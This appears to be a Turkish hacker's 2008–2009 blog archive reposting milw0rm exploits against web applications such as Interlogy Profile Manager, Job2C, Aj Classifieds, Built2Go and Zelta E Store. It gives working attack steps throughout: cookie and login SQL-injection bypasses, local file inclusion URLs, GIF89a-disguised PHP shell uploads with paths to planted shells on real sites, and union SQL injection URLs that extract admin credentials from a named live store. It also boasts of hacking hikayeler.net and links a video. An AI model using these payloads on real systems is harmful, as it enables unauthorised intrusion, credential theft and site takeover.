"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

Rfu etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Rfu etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

9 Haziran 2009 Salı

Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability

kaynak: http://www.milw0rm.com/exploits/8895

kaynak: http://yildirimordulari.com/showthread.php?t=8551



desc:

normal login for cookie

pmadm=dGVzdA;

if ý do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;

or

pmadm=dGVzd123231212313;

not login

if ý do wthis:

pmadm=dGVzd ' or ';

boom this loggin :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

Host Directory PRO 2.1.0 Remote Database Backup Vulnerability

kaynak: http://www.milw0rm.com/exploits/8877

kaynak: http://yildirimordulari.com/showthread.php?t=8550

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

15 Nisan 2009 Çarşamba

Job2C 4.2 (adtype) Multiple Local File Inclusion Vulnerabilities

kaynak: http://www.milw0rm.com/exploits/8443

kaynak: http://www.yildirimordulari.com/showthread.php?t=5228



file:

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];

winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )

exp 1:

yildirimordulari.com/script/windetail.php?adtype=LFi

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

include("lib/".$adtype.".inc"); ( err0r c0de 1 )


exp 2:

yildirimordulari.com/script/detail.php?adtype=LFi00

17 Ocak 2009 Cumartesi

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7811



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Merchandise/uploadimages/20090116084627c.php

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7810



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Personal/uploadimages/20090116083033c.php

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7809



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/uploadimages/20090116070716c.php

3 Ocak 2009 Cumartesi

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7645



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7644



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://www.q-seek.com/

login:

http://www.q-seek.com/member.php

user: salla

pass: salla1

shell:

http://www.q-seek.com/pictures/14_2009-01-02-02-25-03.php

2 Ocak 2009 Cuma

hikayeler.net hacking video

hatırlıyorsanız bir kac gün önce hikayeler.net te acık bulup hacklediğimi söylemiştim. açık file upload açığı. kendilerinede özel mesajla açık olduğunu bildirmiştim. belli ki pekte umursamamışlar madem onlar umursamıyor ben hiç umursamam xD açık kapandımı bilmiyorum. daha sonra hiç kontrol etmedim.

işte video:

TIKLA iNDiR



parola:

z0rlu.blogspot.com

17 Aralık 2008 Çarşamba

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7494

link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt

Discovered By: ZoRLu


exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

 
Dizi